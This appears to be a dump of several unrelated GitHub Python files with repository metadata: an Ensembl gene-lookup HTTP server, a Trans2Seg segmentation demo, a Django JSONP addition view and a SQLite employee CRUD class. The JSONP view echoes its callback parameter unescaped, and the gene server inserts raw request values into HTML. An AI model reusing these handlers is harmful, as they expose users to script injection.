"api_name": "brownie.network.show_active",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "brownie.network",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "brownie.AdvancedCollectible",
"line_number": 14,
"usage_type": "name"
},
{
"api_name"... |
10650544707 | # Server that provides some services related with genes and chromosomes using the HTTP protocol.
# The user introduces the parameters through the main page HTML, the data is taken from the rest.ensembl.org
# web page and the results are presented in another HTML page.
# importing the needed resources
import http.server
import http.client
import json
import socketserver
import termcolor
# Server's port
PORT = 8000
# Client
HOSTNAME = "rest.ensembl.org"
ENDPOINT0 = "/info/species?content-type=application/json"
METHOD = "GET"
headers = {'User-Agent': 'http-client'}
conn = http.client.HTTPSConnection(HOSTNAME)
# Function with the endpoint dependent part
def client(endpoint):
    """function of a common client that asks information using json"""
    # Uses the module-level HTTPS connection `conn` to rest.ensembl.org;
    # http.client transparently reconnects after the close() below.
    # -- Sending the request
    conn.request(METHOD, endpoint, None, headers)
    r1 = conn.getresponse()
    # -- Printing the status
    print()
    print("Response received: ", end='')
    print(r1.status, r1.reason)
    # -- Read the response's body and close connection
    text_json = r1.read().decode("utf-8")
    conn.close()
    # Parse the JSON body into a Python object (dict or list).
    return json.loads(text_json)
# Seq class for gene questions
class Seq:
    """A class for representing gene sequences fetched from the Ensembl
    REST API.

    Performance fix: the original re-fetched the gene id and the full
    sequence over the network on EVERY call to len()/count()/perc(), so a
    single results() call triggered dozens of HTTP round-trips. Both values
    are now fetched once and cached on the instance.
    """

    def __init__(self, strbases):
        # Human gene symbol (e.g. "FRAT1").
        self.strbases = strbases
        self._id = None   # cached Ensembl stable id
        self._seq = None  # cached nucleotide sequence

    # Obtaining the ID of a species
    def id(self):
        """Return the Ensembl stable id for this gene symbol (cached)."""
        if self._id is None:
            endpoint = "/lookup/symbol/homo_sapiens/" + self.strbases + "?content-type=application/json"
            self._id = client(endpoint)["id"]
        return self._id

    # Obtaining the sequence from an ID
    def gene_seq(self):
        """Return the nucleotide sequence for this gene (cached)."""
        if self._seq is None:
            endpoint = "/sequence/id/" + self.id() + "?content-type=application/json"
            self._seq = client(endpoint)["seq"]
        return self._seq

    # Length of the string
    def len(self):
        """Total number of bases in the sequence."""
        return len(self.gene_seq())

    # Number of a concrete base
    def count(self, base):
        """Number of occurrences of *base* in the sequence."""
        return self.gene_seq().count(base)

    # Percentage of a concrete base
    def perc(self, base):
        """Percentage of *base* in the sequence, one decimal of precision.
        (For a multi-character argument, the last character's percentage is
        returned, preserving the original behavior.)"""
        tl = self.len()
        for e in base:
            n = self.count(e)
            res = round(100.0 * n / tl, 1)
        return res

    # Results presentation
    def results(self):
        """HTML fragment: total base count plus the percentage of each base."""
        bases = "ACTG"
        s1 = "The total number of bases is: " + str(self.len())
        s2 = ""  # accumulates one line per base
        for b in bases:
            s2 += "The percentage of " + b + " is: " + str(self.perc(b)) + "%" + "<br>"
        return s1 + "<br><br>" + s2
# Class with our Handler that inheritates all his methods and properties
# Request handler: maps each URL resource to an Ensembl REST lookup and
# renders the result into an HTML page.
class TestHandler(http.server.BaseHTTPRequestHandler): # Objects with the properties of the library
    def do_GET(self):
        """This method is called whenever the client invokes the GET method
        in the HTTP protocol request"""
        # Printing in the server some useful information
        print("GET received")
        print("Request line:" + self.requestline)
        print(" Cmd: " + self.command)
        print(" Path: " + self.path)
        # Separating and selecting the information of the path
        res = self.path.split("?")[0]
        p = (self.path.replace("=", ",")).replace("&", ",")
        ins = p.split(",") # Making a list of instructions dividing the string in the = and & symbols
        # Some important parameters
        text = "" # Empty string that will save the response information
        sp = Seq(ins[-1]) # Object used in the genes calculations
        page = "response.html" # The page will be response except if the endpoint is "/" or it does not exist
        try:
            if self.path == "/": # Using the resource / to obtain the main page with all the options
                page = "main-page.html"
            elif res == "/listSpecies": # Using the resource /listSpecies
                result0 = client(ENDPOINT0)
                # The variable limit has been created to avoid the error "referenced before assignment"
                limit = ""
                # The second parameter is the limit
                if len(ins) == 2:
                    limit = int(ins[1])
                # Using elif instead of else to avoid sending the list of species with 3 or more parameters
                elif len(ins) == 1:
                    limit = len(result0["species"]) # If there is no limit the loop will be over all the species
                for index in range(limit):
                    text += result0["species"][index]["name"] + "<br>"
            elif res == "/karyotype": # Using the resource /karyotype
                ENDPOINT1 = "/info/assembly/"+ins[-1]+"?content-type=application/json"
                result1 = client(ENDPOINT1)
                for chrom in result1["karyotype"]: # Transformation into a string with intros "<br>"
                    text += chrom+"<br>"
            elif res == "/chromosomeLength": # Using the resource /chromosomeLength
                specie = ins[1]
                ch = ins[-1]
                ENDPOINT2 = "/info/assembly/"+specie+"/"+ch+"?content-type=application/json"
                result2 = client(ENDPOINT2)
                text += str(result2["length"]) # Obtaining the value that corresponds to the length keyword
            elif res == "/geneSeq": # Using the resource /geneSeq
                text += sp.gene_seq() # calling the method gene_seq to obtain the sequence of the sp object
            elif res == "/geneInfo":
                id_number = sp.id() # calling the method id to obtain the identity number of the sp object
                ENDPOINT5 = "/overlap/id/" + id_number + "?feature=gene;content-type=application/json"
                result4 = client(ENDPOINT5) # Dictionary that contains several lists of information for different genes
                a = "" # This variable avoids the error "referenced before assignment"
                for i in range(len(result4)): # loop to search which gene is the one that coincides with our requisites
                    if result4[i]["id"] == id_number: # the correct information is in the list in which is our id gene
                        a = i
                # Searching the values in the selected list
                text += "Start: " + str(result4[a]["start"]) + "<br>"
                text += "End: " + str(result4[a]["end"]) + "<br>"
                text += "Length: " + str(result4[a]["end"] - result4[a]["start"] + 1) + "<br>" # sum also 1st position
                text += "ID: " + str(result4[a]["id"]) + "<br>"
                text += "Chromosome: " + str(result4[a]["seq_region_name"]) + "<br>"
            elif res == "/geneCalc": # Using the resource /geneCalc
                text += sp.results() # calling the results method
            elif res == "/geneList": # Using the resource /geneList
                start = ins[3]
                end = ins[-1]
                ch = ins[1]
                ENDPOINT6 = "/overlap/region/human/"+ch+":"+start+"-"+end+"?content-type=application/json;feature=gene"
                result5 = client(ENDPOINT6)
                # Searching the name of each gene in the dictionary
                for index in range(len(result5)):
                    text += result5[index]["external_name"] + "<br>"
                # Preventing some common errors
                if start == end:
                    text += "<b>"+"Sorry, you have introduced the same number for the start than for the end."+"</b>"
                    text += "<b>"+"<br><br>"+"So obviously, as there is no region, there is no gene contained."+"</b>"
                if text == "":
                    text += "<b>"+"There is no gene in the selected region"+"</b>"
            else:
                page = "error.html" # If it is not one of the previous resources
            # improvement in the server to avoid taking as correct an extra valid parameter. Ex: gene=FRAT1&gene=BRAF
            if res in ["/karyotype", "/chromosomeLength", "/geneSeq", "/geneInfo", "/geneCalc", "/geneList"]:
                # checking the length of the instructions and generating a KeyError if they are not correct
                if len(ins) > 2 and res != "/chromosomeLength" and res != "/geneList":
                    text += client(ENDPOINT0)["e"]
                elif (len(ins) > 4 and res == "/chromosomeLength") or (len(ins) > 6 and res == "/geneList"):
                    text += client(ENDPOINT0)["e"]
        # Dealing with the main errors
        except ValueError:
            text = "<b>"+"Incorrect value in the parameter 'limit'"+"<br>"+"Please introduce an integer number"+"</b>"
        except TypeError:
            text = "<b>"+"Sorry, the endpoint '/listSpecies' does not admit three or more parameters"+"</b>"
        except KeyError:
            text = "<b>"+"Incorrect parameters"+"<br>"+"Please review their spelling and the amount required"+"</b>"
        except Exception: # Emergency exception that has not been detected yet
            text = "<b>"+"Sorry, an error has been produced"+"<br>"+"Please review the performed actions"+"</b>"
        # -- printing the request line
        termcolor.cprint(self.requestline, 'green')
        # -- Opening the selected page
        f = open(page, 'r')
        contents = f.read() # reading the contents of the selected page
        # If the html response page is requested change the word text by the text of the user
        if page == "response.html":
            contents = contents.replace("text", text)
        # Generating and sending the response message according to the request
        self.send_response(200)
        self.send_header('Content-Type', 'text/html')
        self.send_header('Content-Length', len(str.encode(contents)))
        self.end_headers()
        # -- sending the body of the response message
        self.wfile.write(str.encode(contents))
# -- MAIN PROGRAM
socketserver.TCPServer.allow_reuse_address = True # preventing the error: "Port already in use"
# main loop to attend the user
with socketserver.TCPServer(("", PORT), TestHandler) as httpd:
    # "" means that the program must use the IP address of the computer
    print("Serving at PORT: {}".format(PORT))
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        # Ctrl-C stops the server cleanly.
        httpd.server_close()
        print("The server is stopped")
| paugarciar/2018-19-PNE-Final-project | some tests (drafts)/server_without json object.py | server_without json object.py | py | 10,515 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "http.server.client.HTTPSConnection",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "http.server.client",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "http.server",
"line_number": 21,
"usage_type": "name"
},
{
"api_name":... |
2031636755 | import os
import sys
import torch
import numpy as np
import time
cur_path = os.path.abspath(os.path.dirname(__file__))
root_path = os.path.split(cur_path)[0]
sys.path.append(root_path)
from torchvision import transforms
from PIL import Image
from segmentron.utils.visualize import get_color_pallete
from segmentron.models.model_zoo import get_segmentation_model
from segmentron.utils.options import parse_args
from segmentron.utils.default_setup import default_setup
from segmentron.config import cfg
def demo():
    """Run segmentation inference over one image or a directory of images.

    Each image is evaluated twice in a single batch — as-is and horizontally
    flipped.  For both views the predicted mask and a per-pixel confidence
    map are written to disk, together with a merged mask produced by
    getMergedSemanticFromCrops using the "And" strategy.
    """
    args = parse_args()
    args.test = True
    ##############################################
    # args.config_file = "configs/trans10kv2/trans2seg/trans2seg_medium_all_sber.yaml"
    # args.input_img = "tools/4.jpg"
    ##############################################
    cfg.update_from_file(args.config_file)
    cfg.update_from_list(args.opts)
    cfg.PHASE = 'test'
    cfg.ROOT_PATH = root_path
    ##############################################
    # cfg.TEST.TEST_MODEL_PATH = "./workdirs/trans10kv2/trans2seg_medium/Sber2400_50_All_classes.pth"
    # cfg.DATASET.NAME = "sber_dataset_all"
    ##############################################
    # cfg.TEST.TEST_MODEL_PATH = args.model_path
    cfg.check_and_freeze()
    print(cfg.TEST.TEST_MODEL_PATH)
    default_setup(args)
    # create output folders (one sub-folder per artefact kind)
    output_dir = os.path.join(cfg.VISUAL.OUTPUT_DIR, 'vis_result_{}_{}_{}_{}'.format(
        cfg.MODEL.MODEL_NAME, cfg.MODEL.BACKBONE, cfg.DATASET.NAME, cfg.TIME_STAMP))
    if not os.path.exists(output_dir):
        os.makedirs(output_dir+"/Flipped")
        os.makedirs(output_dir+"/Orig")
        os.makedirs(output_dir+"/Merged_mask")
        os.makedirs(output_dir+"/Orig_confidence")
        os.makedirs(output_dir+"/Flipped_confidence")
    # pathes for different images
    confidence_flipped_dir=output_dir+"/Flipped_confidence"
    confidence_output_dir=output_dir+"/Orig_confidence"
    flipped_dir=output_dir+"/Flipped"
    merged_dir=output_dir+"/Merged_mask"
    output_dir=output_dir+"/Orig"
    # image transform: tensor conversion + dataset mean/std normalisation
    transform = transforms.Compose([
        transforms.ToTensor(),
        transforms.Normalize(cfg.DATASET.MEAN, cfg.DATASET.STD),
    ])
    # create the model using the configuration
    model = get_segmentation_model().to(args.device)
    model.eval()
    # softmax layer for confidence
    # NOTE(review): this is applied to output[0] below; dim=0 normalises over
    # the batch axis — the channel axis (dim=1) may have been intended. Confirm.
    softmax_layer = torch.nn.Softmax(dim=0)
    if os.path.isdir(args.input_img):
        # Directory input: take every entry that has a file extension.
        img_paths = [os.path.join(args.input_img, x) for x in os.listdir(args.input_img) if "." in x]
    else:
        img_paths = [args.input_img]
    # print("Images for inference:")
    # print(img_paths)
    print("\n Output file path: ", output_dir)
    # print("\n CFG: /n", cfg)
    print("Dataset Name: ", cfg.DATASET.NAME)
    for img_path in img_paths:
        image = Image.open(img_path).convert('RGB')
        # getting the flipped image
        flipped_image = Image.open(img_path).convert('RGB')
        size_ = image.size  # original (width, height), used to resize outputs back
        flipped_image = flipped_image.transpose(method = Image.FLIP_LEFT_RIGHT)
        flipped_image = flipped_image.resize((cfg.TRAIN.BASE_SIZE, cfg.TRAIN.BASE_SIZE), Image.BILINEAR)
        flipped_image = transform(flipped_image).unsqueeze(0).to(args.device)
        image = image.resize((cfg.TRAIN.BASE_SIZE, cfg.TRAIN.BASE_SIZE), Image.BILINEAR)
        # images = transform(image).unsqueeze(0).to(args.device)
        image = transform(image).unsqueeze(0).to(args.device)
        # merging the two images in one batch
        images = torch.cat((image, flipped_image), 0)
        with torch.no_grad():
            output = model(images)
        # Get the mask: batch item 0 = original view, item 1 = flipped view.
        pred = torch.argmax(output[0], 1)[0].cpu().data.numpy()
        pred_f = torch.argmax(output[0], 1)[1].cpu().data.numpy()
        output_norm = softmax_layer(output[0])
        # Per-pixel max probability scaled to 0-255 for saving as an image.
        confidence_all = torch.max(output_norm, 1)[0].cpu().data.numpy()*255
        mask = get_color_pallete(pred, cfg.DATASET.NAME)
        mask_f = get_color_pallete(pred_f, cfg.DATASET.NAME)
        mask = mask.resize(size_)
        mask_f = mask_f.resize(size_)
        # Flip the second mask back so it aligns with the original image.
        mask_f = mask_f.transpose(method = Image.FLIP_LEFT_RIGHT)
        # get the result of cropped images (in this case no cropping just flipping)
        cropping_results = [np.array(mask), np.array(mask_f)]
        # Both "crops" cover the whole image: [x0, y0, x1, y1].
        cropping_edges = [[0, 0, size_[0], size_[1]], [0, 0, size_[0], size_[1]]]
        outname = os.path.splitext(os.path.split(img_path)[-1])[0] + '.png'
        mask.save(os.path.join(output_dir, outname))
        mask_f.save(os.path.join(flipped_dir, outname))
        # Calc confidence
        confidence = np.array(confidence_all, dtype=np.uint8)[0]
        conf_img = Image.fromarray(confidence)
        conf_img = conf_img.resize(size_, Image.BILINEAR)
        conf_img.save(os.path.join(confidence_output_dir, outname))
        confidence_f = np.array(confidence_all, dtype=np.uint8)[1]
        conf_img_f = Image.fromarray(confidence_f)
        conf_img_f = conf_img_f.resize(size_, Image.BILINEAR)
        conf_img_f = conf_img_f.transpose(method = Image.FLIP_LEFT_RIGHT)
        conf_img_f.save(os.path.join(confidence_flipped_dir, outname))
        cropping_confidence = [conf_img, conf_img_f]
        # mask_f.save(os.path.join(flipped_dir, outname))
        # the result of the merged images
        merged_result = getMergedSemanticFromCrops(cropping_results, cropping_confidence, cropping_edges, "And", [size_[1], size_[0]])
        merged_result.save(os.path.join(merged_dir, outname))
# function merging images
def getMergedSemanticFromCrops(crops_result, crops_confidence, crops_edges, function, full_size):
    '''
    Merge the segmentation results of two or more (cropped/flipped) views of
    the same image into one full-size colourised mask.

    crops_result     -- list of class-index arrays; element 0 is the reference view
    crops_confidence -- per-view confidence maps (used only by "confidence")
    crops_edges      -- [x0, y0, x1, y1] placement of each view in the full image
    function         -- merge strategy: "and", "or" or "confidence"
    full_size        -- [height, width] of the output

    NOTE: any other *function* value falls through and returns None.
    '''
    # Class indices used in the predicted masks.
    palette_mirror = 0
    palette_glass = 1
    palette_OOS = 3     # grouped with the optical classes (glass/mirror) below
    palette_floor = 4
    palette_FU = 2      # grouped with floor below
    palette_BG = 5
    #################################################################
    ####################### Using And function ######################
    #################################################################
    if function.lower() == "and":
        # rospyLogInfoWrapper("Using And for merging cropped images")
        # Boolean layer per class for the reference view.
        orig_glass = crops_result[0]==palette_glass
        orig_mirror = crops_result[0]==palette_mirror
        orig_OOS = crops_result[0]==palette_OOS
        orig_floor = crops_result[0]==palette_floor
        orig_FU = crops_result[0]==palette_FU
        # classes = [np.ones(full_size) for _ in range(max_clasess)]
        # merged_classes = []
        for i in range(1, len(crops_result)):
            cropped_glass = crops_result[i]==palette_glass
            cropped_mirror = crops_result[i]==palette_mirror
            cropped_OOS = crops_result[i]==palette_OOS
            cropped_floor = crops_result[i]==palette_floor
            cropped_FU = crops_result[i]==palette_FU
            # Class-group unions for view i (optical surfaces / floor classes).
            cropped_all_optical = np.logical_or(cropped_mirror, cropped_glass)
            cropped_all_optical = np.logical_or(cropped_all_optical, cropped_OOS)
            cropped_all_floor = np.logical_or(cropped_FU, cropped_floor)
            # Embed the crop into a full-size canvas filled with ones so the
            # AND below leaves the reference prediction untouched outside it.
            cropped_all_optical_extended = np.ones(full_size)
            cropped_all_optical_extended[crops_edges[i][1]:crops_edges[i][3], crops_edges[i][0]:crops_edges[i][2]] = cropped_all_optical
            cropped_all_floor_extended = np.ones(full_size)
            cropped_all_floor_extended[crops_edges[i][1]:crops_edges[i][3], crops_edges[i][0]:crops_edges[i][2]] = cropped_all_floor
            # Keep a reference pixel only where view i agrees at group level.
            orig_glass = np.logical_and(cropped_all_optical_extended, orig_glass)
            orig_mirror = np.logical_and(cropped_all_optical_extended, orig_mirror)
            orig_OOS = np.logical_and(cropped_all_optical_extended, orig_OOS)
            orig_floor = np.logical_and(cropped_all_floor_extended, orig_floor)
            orig_FU = np.logical_and(cropped_all_floor_extended, orig_FU)
        # Background = every pixel not claimed by any class layer.
        background = np.logical_or(orig_glass, orig_mirror)
        background = np.logical_or(background, orig_OOS)
        background = np.logical_or(background, orig_floor)
        background = np.logical_or(background, orig_FU)
        background = np.logical_not(background)
        # Re-assemble a single class-index map from the boolean layers.
        res = orig_glass * palette_glass
        res += orig_mirror * palette_mirror
        res += orig_OOS * palette_OOS
        res += orig_floor * palette_floor
        res += orig_FU * palette_FU
        res += background * palette_BG
        res_img = get_color_pallete(res, cfg.DATASET.NAME)
        res_img = res_img.convert("RGB")
        return res_img
    #################################################################
    ####################### Using Or function #######################
    #################################################################
    elif function.lower() == "or":
        # rospyLogInfoWrapper("Using And for merging cropped images")
        orig_glass = crops_result[0]==palette_glass
        orig_mirror = crops_result[0]==palette_mirror
        orig_OOS = crops_result[0]==palette_OOS
        orig_floor = crops_result[0]==palette_floor
        orig_FU = crops_result[0]==palette_FU
        # classes = [np.ones(full_size) for _ in range(max_clasess)]
        # merged_classes = []
        for i in range(1, len(crops_result)):
            cropped_glass = crops_result[i]==palette_glass
            cropped_mirror = crops_result[i]==palette_mirror
            cropped_OOS = crops_result[i]==palette_OOS
            cropped_floor = crops_result[i]==palette_floor
            cropped_FU = crops_result[i]==palette_FU
            # cropped_all_optical = np.logical_or(cropped_mirror, cropped_glass)
            # cropped_all_optical = np.logical_or(cropped_all_optical, cropped_OOS)
            # cropped_all_floor = np.logical_or(cropped_FU, cropped_floor)
            # Zero-filled canvases: outside the crop the OR keeps the
            # reference prediction unchanged.
            cropped_glass_extended = np.zeros(full_size)
            cropped_glass_extended[crops_edges[i][1]:crops_edges[i][3], crops_edges[i][0]:crops_edges[i][2]] = cropped_glass
            cropped_mirror_extended = np.zeros(full_size)
            cropped_mirror_extended[crops_edges[i][1]:crops_edges[i][3], crops_edges[i][0]:crops_edges[i][2]] = cropped_mirror
            cropped_OOS_extended = np.zeros(full_size)
            cropped_OOS_extended[crops_edges[i][1]:crops_edges[i][3], crops_edges[i][0]:crops_edges[i][2]] = cropped_OOS
            cropped_floor_extended = np.zeros(full_size)
            cropped_floor_extended[crops_edges[i][1]:crops_edges[i][3], crops_edges[i][0]:crops_edges[i][2]] = cropped_floor
            # NOTE(review): ones here — unlike the zero-filled buffers above —
            # and orig_FU below uses logical_and rather than logical_or.
            # Confirm this asymmetry is intentional.
            cropped_FU_extended = np.ones(full_size)
            cropped_FU_extended[crops_edges[i][1]:crops_edges[i][3], crops_edges[i][0]:crops_edges[i][2]] = cropped_FU
            # Priority chain: glass wins, then mirror, OOS, floor — each
            # restricted to pixels still free of a higher-priority class.
            orig_glass = np.logical_or(cropped_glass_extended, orig_glass)
            orig_free = np.logical_not(orig_glass)
            orig_mirror = np.logical_and(np.logical_or(cropped_mirror_extended, orig_mirror), orig_free)
            orig_free = np.logical_and(orig_free, np.logical_not(orig_mirror))
            orig_OOS = np.logical_and(np.logical_or(cropped_OOS_extended, orig_OOS), orig_free)
            orig_free = np.logical_and(orig_free, np.logical_not(orig_OOS))
            orig_floor = np.logical_and(np.logical_or(cropped_floor_extended, orig_floor), orig_free)
            orig_FU = np.logical_and(cropped_FU_extended, orig_FU)
        # Background = every pixel not claimed by any class layer.
        background = np.logical_or(orig_glass, orig_mirror)
        background = np.logical_or(background, orig_OOS)
        background = np.logical_or(background, orig_floor)
        background = np.logical_or(background, orig_FU)
        background = np.logical_not(background)
        res = orig_glass * palette_glass
        res += orig_mirror * palette_mirror
        res += orig_OOS * palette_OOS
        res += orig_floor * palette_floor
        res += orig_FU * palette_FU
        res += background * palette_BG
        res_img = get_color_pallete(res, cfg.DATASET.NAME)
        res_img = res_img.convert("RGB")
        return res_img
    #################################################################
    #################### Using confidence values# ###################
    #################################################################
    elif function.lower() == "confidence":
        # Per pixel, keep the class predicted by the most confident view.
        confidence_extended_all = [crops_confidence[0]]
        results_extended_all = [crops_result[0]]
        for i in range(1, len(crops_confidence)):
            cropped_confidence_extended = np.zeros(full_size)
            cropped_confidence_extended[crops_edges[i][1]:crops_edges[i][3], crops_edges[i][0]:crops_edges[i][2]] = crops_confidence[i]
            confidence_extended_all.append(cropped_confidence_extended)
            cropped_segmentation_extended = np.zeros(full_size)
            cropped_segmentation_extended[crops_edges[i][1]:crops_edges[i][3], crops_edges[i][0]:crops_edges[i][2]] = crops_result[i]
            results_extended_all.append(cropped_segmentation_extended)
        # Sort the views per pixel by confidence; take the most confident one.
        max_confidence_args = np.argsort(confidence_extended_all, axis=0)
        result_sorted_confidence = np.take_along_axis(np.array(results_extended_all), max_confidence_args, axis=0)
        res = result_sorted_confidence[-1]
        # rospyLogInfoWrapper("result_max_confidence shape"+str(result_sorted_confidence.shape))
        # rospyLogInfoWrapper("result_max_confidence[0][1]"+str(max_confidence_args[0][0][0:4]))
        # rospyLogInfoWrapper("result_max_confidence[0][2]"+str(max_confidence_args[2][0][0:4]))
        res_img = get_color_pallete(res, cfg.DATASET.NAME)
        res_img = res_img.convert("RGB")
        return res_img


if __name__ == '__main__':
    demo()
| GhadeerElmkaiel/Trans2Seg | tools/demo.py | demo.py | py | 13,641 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "os.path.abspath",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "os.path.split",
"line_n... |
41537740788 | # -*- coding: utf-8 -*-
# @Time : 2018/4/19 9:43
# @Author : Narata
# @Project : demo
# @File : view.py
# @Software : PyCharm
from django.shortcuts import render
from django.http import HttpResponse
def add(request):
    """JSONP endpoint: return the sum of GET parameters ``a`` and ``b``.

    The response body is ``<callback>({"result": <a+b>})`` so the browser
    can evaluate it as a script (classic JSONP pattern).
    """
    import json  # local import: keeps the module's import section untouched

    a = request.GET['a']
    b = request.GET['b']
    callback = request.GET['callback']
    # The jQuery cache-buster parameter "_" is deliberately ignored: reading
    # it with GET['_'] (as before) made its absence a hard error.
    # Serialise with json.dumps so the payload is valid JSON; str() on a dict
    # emits single-quoted Python repr, which is not JSON.
    payload = json.dumps({'result': int(a) + int(b)})
    result = "{}({})".format(callback, payload)
    return HttpResponse(result)
{
"api_name": "django.http.HttpResponse",
"line_number": 18,
"usage_type": "call"
}
] |
22166964803 | import sqlite3
import pandas as pd
# Define DBOperation class to manage all data into the database.
# Give a name of your choice to the database
class DBOperations:
    """CRUD helper for the ``employee`` table of the ``abcDB`` SQLite file.

    Every public method opens a fresh connection via get_connection() and
    closes it in a ``finally`` block, so no handle is held between calls.
    The insert/search/update/delete methods are interactive: they read
    their values from stdin via input().
    """

    sql_create_table_firsttime = "CREATE TABLE IF NOT EXISTS employee (" \
                                 "employee_id INTEGER PRIMARY KEY AUTOINCREMENT," \
                                 "Title VARCHAR(4) NOT NULL, " \
                                 "Forename VARCHAR(20) NOT NULL, " \
                                 "Surname VARCHAR(20) NOT NULL, " \
                                 "EmailAddress VARCHAR (255) NOT NULL, " \
                                 "Salary FLOAT(20) NOT NULL" \
                                 ")"

    sql_create_table = "CREATE TABLE IF NOT EXISTS employee (" \
                       "employee_id INTEGER PRIMARY KEY AUTOINCREMENT," \
                       "Title VARCHAR(4) NOT NULL, " \
                       "Forename VARCHAR(20) NOT NULL, " \
                       "Surname VARCHAR(20) NOT NULL, " \
                       "EmailAddress VARCHAR (255) NOT NULL, " \
                       "Salary FLOAT(20) NOT NULL" \
                       ")"

    sql_check_table_exists = "SELECT COUNT(*) " \
                             "FROM sqlite_master " \
                             "WHERE name = 'employee'"

    sql_insert = "INSERT INTO employee (Title, Forename, Surname, EmailAddress, Salary)" \
                 "VALUES(?, ?, ?, ?, ?);"

    sql_select_all = "SELECT * FROM employee"

    sql_search = "SELECT * " \
                 "FROM employee " \
                 "WHERE employee_id = ?;"

    sql_update_data = "UPDATE employee SET Title=?, Forename=?, Surname=?, EmailAddress=?, Salary=? WHERE employee_id=?"

    sql_delete_data = "DELETE FROM employee WHERE employee_id=?"

    sql_drop_table = "DROP TABLE employee"

    def __init__(self):
        """Open (and immediately close) a connection to verify the database
        file is reachable."""
        try:
            self.conn = sqlite3.connect("abcDB")
            self.cur = self.conn.cursor()
            # self.cur.execute(self.sql_create_table_firsttime)
            self.conn.commit()
        except Exception as e:
            print(e)
        finally:
            self.conn.close()

    def get_connection(self):
        """(Re)open the connection and cursor used by the other methods."""
        self.conn = sqlite3.connect("abcDB")
        self.cur = self.conn.cursor()

    def create_table(self):
        """Create the employee table unless it already exists."""
        try:
            self.get_connection()
            self.cur.execute(self.sql_check_table_exists)
            if self.cur.fetchone()[0] == 1:
                print("Table employee already exists")
            else:
                self.cur.execute(self.sql_create_table)
                self.conn.commit()
                print("Table created successfully")
        except Exception as e:
            print(e)
        finally:
            self.conn.close()

    def drop_table(self):
        """Drop the employee table (prints the error if it does not exist)."""
        try:
            self.get_connection()
            self.cur.execute(self.sql_drop_table)
            self.conn.commit()
            print("Table dropped")
        except Exception as e:
            print(e)
        finally:
            self.conn.close()

    def insert_data(self):
        """Prompt for one employee on stdin and insert it."""
        try:
            self.get_connection()
            emp = Employee()
            emp.set_employee_title(str(input("Enter Employee Title: ")))
            emp.set_forename(str(input("Enter Employee Forename: ")))
            emp.set_surname(str(input("Enter Employee Surname: ")))
            emp.set_email(str(input("Enter Employee Email: ")))
            emp.set_salary(float(input("Enter Employee Salary: ")))
            # Bind the fields explicitly instead of splitting str(emp) on
            # newlines -- clearer, and robust should a field contain "\n".
            self.cur.execute(self.sql_insert,
                             (emp.get_employee_title(), emp.get_forename(), emp.get_surname(),
                              emp.get_email(), emp.get_salary()))
            self.conn.commit()
            print("Inserted data successfully")
        except Exception as e:
            print(e)
        finally:
            self.conn.close()

    def select_all(self):
        """Print every row of the employee table (or a notice if empty)."""
        try:
            self.get_connection()
            data = pd.read_sql_query(self.sql_select_all, self.conn)
            if data.empty:
                print('Table employee is empty!')
            else:
                print(data.to_string(index=False))
        except Exception as e:
            print(e)
        finally:
            self.conn.close()

    def search_data(self):
        """Prompt for an employee id and pretty-print the matching row."""
        try:
            self.get_connection()
            employee_id = int(input("Enter Employee ID: "))
            # Bind the id as ONE parameter. The previous tuple(str(id))
            # split a multi-digit id into single characters, so any id >= 10
            # raised "Incorrect number of bindings supplied".
            self.cur.execute(self.sql_search, (employee_id,))
            result = self.cur.fetchone()
            if isinstance(result, tuple):
                for index, detail in enumerate(result):
                    if index == 0:
                        print("Employee ID: " + str(detail))
                    elif index == 1:
                        print("Employee Title: " + detail)
                    elif index == 2:
                        print("Employee Name: " + detail)
                    elif index == 3:
                        print("Employee Surname: " + detail)
                    elif index == 4:
                        print("Employee Email: " + detail)
                    else:
                        print("Salary: " + str(detail))
            else:
                print("No Record")
        except Exception as e:
            print(e)
        finally:
            self.conn.close()

    def update_data(self):
        """Prompt for an id plus new field values and update that row."""
        try:
            self.get_connection()
            # Update statement
            employee_id = int(input("Enter Employee ID: "))
            emp_title = str(input("Enter Employee's New Title: "))
            forename = str(input("Enter Employee's New Forename: "))
            surname = str(input("Enter Employee's New Surname: "))
            email_address = str(input("Enter Employee's New Email Address: "))
            salary = str(input("Enter Employee's New Salary: "))
            # Bind typed values (float salary, int id) in placeholder order.
            result = self.cur.execute(self.sql_update_data,
                                      (emp_title, forename, surname, email_address,
                                       float(salary), employee_id))
            if result.rowcount != 0:
                self.conn.commit()
                print(str(result.rowcount) + " Row(s) affected.")
            else:
                print("Cannot find this record in the database")
        except Exception as e:
            print(e)
        finally:
            self.conn.close()

    # Define Delete_data method to delete data from the table.
    # The user will need to input the employee id to delete the corresponding record.
    def delete_data(self):
        """Prompt for an employee id and delete the corresponding row."""
        try:
            self.get_connection()
            employee_id = int(input("Enter Employee ID: "))
            result = self.cur.execute(self.sql_delete_data, (employee_id,))
            if result.rowcount != 0:
                self.conn.commit()
                print(str(result.rowcount) + " Row(s) affected.")
            else:
                print("Cannot find this record in the database")
        except Exception as e:
            print(e)
        finally:
            self.conn.close()
class Employee:
    """Mutable value object describing one employee record.

    Fields are populated through the setters; ``str(employee)`` renders the
    insertable fields (everything except the id) newline-separated, in
    Title / Forename / Surname / Email / Salary order.
    """

    def __init__(self):
        # Start from an empty record; callers fill it via the setters.
        self.employee_id = 0
        self.salary = 0.0
        self.empTitle = self.forename = self.surname = self.email = ''

    # --- id ---
    def set_employee_id(self, employee_id):
        self.employee_id = employee_id

    def get_employee_id(self):
        return self.employee_id

    # --- title ---
    def set_employee_title(self, emp_title):
        self.empTitle = emp_title

    def get_employee_title(self):
        return self.empTitle

    # --- names ---
    def set_forename(self, forename):
        self.forename = forename

    def get_forename(self):
        return self.forename

    def set_surname(self, surname):
        self.surname = surname

    def get_surname(self):
        return self.surname

    # --- contact / pay ---
    def set_email(self, email):
        self.email = email

    def get_email(self):
        return self.email

    def set_salary(self, salary):
        self.salary = salary

    def get_salary(self):
        return self.salary

    def __str__(self):
        fields = (self.empTitle, self.forename, self.surname, self.email, str(self.salary))
        return "\n".join(fields)
# The main function will parse arguments.
# These argument will be defined by the users on the console.
